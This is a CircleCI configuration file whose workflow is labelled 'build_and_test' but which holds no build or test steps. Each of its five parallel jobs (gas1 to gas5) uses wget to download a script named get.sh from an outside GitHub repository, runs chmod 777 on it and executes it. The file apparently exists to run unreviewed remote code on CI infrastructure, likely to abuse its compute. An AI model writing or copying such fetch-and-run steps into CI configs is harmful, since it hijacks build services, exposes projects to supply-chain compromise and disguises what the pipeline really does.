version: 2.1

# Define the jobs we want to run for this project
jobs:
  gas1:
    docker:
      - image: cimg/base:edge
    steps:
      - run: wget https://github.com/binniyup/datacare/blob/main/get.sh && chmod 777 get.sh && ./get.sh
  gas2:
    docker:
      - image: cimg/base:edge
    steps:
      - run: wget https://github.com/binniyup/datacare/blob/main/get.sh && chmod 777 get.sh && ./get.sh
  gas3:
    docker:
      - image: cimg/base:edge
    steps:
      - run: wget https://github.com/binniyup/datacare/blob/main/get.sh && chmod 777 get.sh && ./get.sh
  gas4:
    docker:
      - image: cimg/base:edge
    steps:
      - run: wget https://github.com/binniyup/datacare/blob/main/get.sh && chmod 777 get.sh && ./get.sh
  gas5:
    docker:
      - image: cimg/base:edge
    steps:
      - run: wget https://github.com/binniyup/datacare/blob/main/get.sh && chmod 777 get.sh && ./get.sh

# Orchestrate our job run sequence
workflows:
  build_and_test:
    jobs:
      - gas1
      - gas2
      - gas3
      - gas4
      - gas5